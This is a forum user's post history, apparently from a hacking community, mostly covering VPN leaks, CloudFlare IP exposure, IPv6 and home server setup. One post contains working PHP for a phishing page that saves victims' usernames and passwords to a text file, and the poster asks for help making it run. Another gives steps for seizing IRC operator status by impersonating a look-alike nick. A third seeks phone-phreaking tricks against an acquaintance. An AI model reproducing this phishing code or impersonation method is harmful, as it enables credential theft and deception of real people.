whitehat

Posts posted by whitehat

  1. This has all been great stuff, thank you guys. Please let me know if you think of anything else. I liked the YouTube video; thanks DigiP. I will be watching to see if Pwnd2Pwnr finds anything in the books he mentioned.

    I've got my research cut out for me. I will look up all the topics you guys mentioned that I was not familiar with (pretty much everything except the red and blue boxes). For my own education if not for immediate use.

  2. I know this is a long shot (since it's 2012), but we don't have any Phone Phreaks in the house, do we?

    There's an older guy I have known for a couple of years from a Commodore club -- a real old school phone phreak. I respect the heck out of him and we normally get along really well, but we're having a little friendly disagreement right now, which has given way to him phone phreaking me a bit. He somehow made my calls forward to an adult bookstore and their calls forward to me.

    It's in good fun, but obviously I want to hit him back. I have read old proto-hacker stories about phone phreaking, but I don't know any decent tricks that I can pull off on the modern phone system, other than Caller ID spoofing. I suppose a lot of it is social engineering; though I'm not really good at that at all.

    Any suggestions, thoughts, tips, tricks, useful stories, or related download links?

  3. Thanks DigiP. I went ahead and contacted the host right after you said that. I just heard back. My host is totally cool and he said he's happy to help in any way, but basically has no clue what to do : /

    I can try contacting CloudFlare, but as a free member I doubt if that will pan out. I'm kind of wondering if the trick is simply to disable Mail and FTP. I use those 2 things and those are the 2 that are leaking the IP, but I don't use the other 6-7 things that could have (but did not) leak my server's IP.

    I just don't want that to be the answer, because I pretty much have to keep using mail, if not mail + ftp.

  4. Over the past few months I've noticed every 14 year old on the Internet has a booter with a CloudFlare resolver. I would like to keep my domain safe from DDOS.

    When I type in my domain name at www.cloudflareresolver.com however, it does show my real IP on the mail and FTP lines. I've noticed many other CloudFlare sites do not leak their IP in this way though.

    How do I configure it such that my IP will not be leaked? I do use the server for mail, I hope I won't have to lose that functionality.

  5. Wow! This looks extremely interesting; I'm going to have to go over it and try out the commands soon.

    You're right of course, there's always a significant tradeoff of speed for security. I really just want to figure out how to properly anonymize like this, just for some unknown/unlikely possible future need, not for regular usage. Like if I go overseas and need to send some politically sensitive data home some day. Or if they leak a new "Tron" movie, I might not be able to resist downloading it :)

    For the record I did find a bit of a second-rate solution to my other problem, which was that if the VPN disconnects you might not want your real IP to be exposed to the torrent or whatever servers you're connected to, etc. It's a rudimentary script: http://vpnetmon.webs.com/

  6. I've been really frustrated over the past couple of years by VPNs disconnecting and leaking real IPs. It's never been a life or death issue for me, but it's plenty annoying and when I introduce people to the concept of a VPN or proxy and set them up with it I really want it to work without betraying them.

    I know that disconnects happen, especially when you've been connected for long periods of time. Can't change that. But is there some way to tell Windows, OS X, and/or Linux that "when this VPN [or proxy] gets disconnected I want you to disconnect from the Internet/Access Point and do not send any traffic unless I've reconnected?".

    Also, I'm wondering if it's possible to get some additional layers, like with a simple proxy chain. I've never heard of anyone getting a chain of VPNs to work, although I used to do VPS + VPN pretty easily. How about proxies + VPN? If I tell application X, like a torrent client or email program or whatever, to use this HTTP or SOCKS5 proxy while my OpenVPN is running then will the traffic going to application X pass through both the OpenVPN and proxy or will the proxy essentially operate independently of the VPN?

    What I mean is, normally the VPN knows your "real" IP as well as the server IP it assigns to you. The same is true of a SOCKS 5 or HTTP proxy. But can we make it where traffic goes from you to the VPN then from the VPN to the proxy, such that the proxy never sees your real IP and the external Internet never sees the IP of the VPN?

  7. I have an extra desktop computer with no OS installed, that I use for playing with live boot linux disks.

    I would like to host my own server/website, with the maximum possible security and anonymity then offer it up as a hacking target like www.hackthissite.org so that I can learn by trial and error how to secure/run a server, and maybe make a few friends in the process (visitors).

    What choices would you make to get started?

    Do you think that the choice of server matters, or are they all basically equal except for whichever one is easiest to configure properly? Should I just go with Apache despite all the vulnerabilities?

    What would be the role of a service like www.noip.com or dyn.com? Would those DNS services actually keep website visitors from seeing my home internet connection IP? If I register a domain, sign up an account at www.noip.com, is that no IP host my nameserver for the DNS name?

    If I have the website/webapp running on the old desktop I'm making my server, then can I still use VPNs on my other home computers/laptops/devices without knocking my website offline?

    Does it matter which distro/OS I pick, and what do you recommend if so? Most of the sec distros at www.distrowatch.com are blackhat focused, so I don't know if it would really help me as the webmaster / sys admin?

    Should I use something like NetSecL or LPS that is configured to be isolated and more locked down?

    Thanks in advance

  8. Thanks very much for the help!

    Hurricane Electric, thanks so much you're a lifesaver. Someone from the Cesidian root showed it to me ages ago but I didn't quite get it and I've been trying to recall what that thing was.

    It's going to be stretching my limits but I will read all up on it and try to do as you described. I will only need to run this app on one computer so hopefully it will be a manageable task. It's proprietary but it's performing a certain type of statistical/economic analysis on data in their database.

  9. For this question I'm going to get down on my knees and beg for a helping hand, spoon feeding, or anything except RTFM / Google it / get a degree in IT/CS...

    Please, please help me become IPv6 compatible. I tried to understand and read stuff about this a few months ago, but it's confusing to a layman and I was told by my ISP in March that at the universal IPv6 date everything would be automatically compatible/upgraded/enabled so I can quit worrying about it.

    Well now it is not only past IPv6 day, but I've got an urgent task for a client that requires my software to be IPv6 compatible apparently, and I am not compatible.

    If you could give me the simplest, straight-line path to resolving this I would be very grateful. I use all three major OS families, so I will take support for any/all. I have all browsers, but prefer Aurora (FF 16) and the program is a proprietary web app.

  10. You see, Mr. P? Look at you being all helpful! As almost always!!

    You can't help it! You love it! You didn't tell him to Google it or that you don't spoon-feed or anything. He asked a question and you knew the answer so you answered it. Then he asked ANOTHER question even though he has a perfectly good Google-capable browser and you answered it AGAIN.

    It's not just bc of the sub-forum either. I can point out you being all helpful in Jasager and probably every area of the forum. You can't help yourself. You're NICE and HELPFUL and you love questions! You even ask them!

    ;) lolololol <3 <3 <3 Now go tell "science" you're sorry ;) jk! you da man

  11. I don't think I have enough of a history on this forum (or any forum, for security reasons) to dig into the "is it okay to ask questions or should the forum be replaced with a link to google" debate*. It's fine by me if people want to ask and answer questions here though, getting much more quality and reputable answers in a more reliable and custom form than what you'd get with only your own research.

    I just want to say OVER 9,000 INTERNETS to DigiP.

    I don't know how hackers could possibly think things are secure. I live in digip's world. There are vulnerabilities EVERYWHERE. If you're OP and you've been inexplicitly out of the loop since 1999 you're probably overwhelmed with all the many new holes in security to catch up with as a pen tester or, in his case, an IRC Op I guess.

    As it happens, IRC is actually one of my least favorite parts of the Internet (logs+pointless chatter, IMHO) so I don't know much about it and I've never even had voice let alone been an Op or admin or whatever. But even I knew about wIRC and there are toooons of vulnerabilities that affect big fat networks like DalNET, EFnet, Freenode, etc. Why? Because the IRC clients can be determined on all those nets -- and those clients have exploits, hacks, bugs, you name it. Maybe not every client at every given moment but in wIRC they have about 200 different kills built in that worked at the time and about 25% of them still work years later.

    Especially for mIRC which may as well be called insecureIRC. I see all this without being 10% of the hacker that Mr. P is and with spending an average of 10 minutes on IRC per year.

    Oh yea, one more thing -- there are billions of bots in IRC right? Good and evil. Well, many of those bots can be pwned. Not to mention, there's plenty of room for the strongest tool in the traditional hacker's toolbox... the same tool that just got like 50,000 linux users' credit cards stolen from WH-whatever the server billing company... social engineering!

    This is basic, but you can go on there and watch quietly, see when people come and go. See the Op/voice handoffs or whatever. Wait, patiently for some key dude to leave, get his nick or one that's similar (like if his is "pos1tronics" yours is "pos1tron1cs" with the same other info in your profile) and when the current Op is going offline or something you say "Hey buddy, I'll take over". I know that's a rough example, but I hope the general point is conveyed.

    * Love you, Mr.P <3! You da man and you help people all the time despite what you say! You love it and we love you ;)

  12. I was mainly just teasing, Mr. P. Although it does seem like 95% of hak5 revolves around WiFi, but you're right that there's a richer set of knowledge, such as with the plug experts.

    Still, you do realize you just told him that either exploits don't exist or they do and the information is out there on the Internet unless it's not... so in other words we have no clue ;) Just for the record Mr. P is actually extremely smart and knows a ton about computing/hacking. So I should probably phrase that observation that we have no clue with "with all due respect"...I just think the OP may have randomly touched upon a chink in the hak5 armor or something, though.

    I believe there was a good script called wIRC, but it's about 5 years old and was mainly just anti-mIRC kills and scripted insults. I will admit that I have no clue for the linux clients like WeeChat or Freenode/Dalnet. WeeChat did have some exploits but they're patched and like you said I use exploit-db to look for them since it comes as a default link in BT5...

  13. From command line run

    echo 1 > /proc/sys/net/ipv4/ip_forward

    That should correct your Internet sharing issue.

    For real? Sweet! I wish I had it on me to give it a try, but I'll be back to it in 8 - 12 hours. What's going on there? I thought echo just printed (showed) anything you type after it?

  14. My HTML webpage seems to work fine -- it looks like the real page that I'm emulating and the forms work -- but when the submit button is clicked instead of sending the data to PHP that saves it as a file and redirects the client (or, ideally, closes the window) my PHP just displays all the code in the browser. Can you help me figure out why? Here's the general format that I'm using:

    
    <?php
    if ($_POST['submit']){
    
    $myFile = "donatedpw.txt";
    $fh = fopen($myFile, 'a') or die("can't open file");
    $stringData = "username: " . $_POST['username'] . "\n";
    fwrite($fh, $stringData);
    $stringData = "password: " . $_POST['password'] . "\n";
    fwrite($fh, $stringData);
    fclose($fh);
    
    } ?>
    
    <script>location.href='http://google.com';</script>
    
    

    source: http://thisislegal.com/wiki/Create_a_phishing_page

  15. I am huge into movies so I'm up for watching any movie that is good but I'm hoping to find more documentaries than Hollywood entertainment. I can't find Hackers Wanted, Hackers Freedom Downtime, BBS The Documentary, or Hackers Are People Too on Netflix, which really sucks! I've seen all of the Hollywood ones except for Sneakers and Track Down, though the Stieg Larsson ones aren't really products of Hollywood I guess. I have Track Down at the top of my Netflix DVD Q, but Sneakers doesn't look that interesting, even though it does have Robert Redford, so it's closer to the "someday" end of my Q.

    I guess I will have to just search the internet to find a place to watch the documentaries I haven't seen yet. If that doesn't work I'll have to buy them on DVD/BluRay.

    That hackvids site will help a lot. Hopefully most or all of the links are still working.

    It's not called Hackers Freedom Downtime (I tried to correct the OP on that, hehe), it's called Freedom Downtime and you can get it from the producer, Eric (Emmanuel Goldstein) who is also the editor of 2600 and a talk show host. But the sad truth is you really need to see Take Down before you see Freedom Downtime to understand the context.

    http://www.freedomdowntime.com

    It can also be found to download for free of course, but if you do that get the 2004 not the 2003 version. The 2003 was a leak and the movie changed a lot, including adding a seminal Mitnick interview.
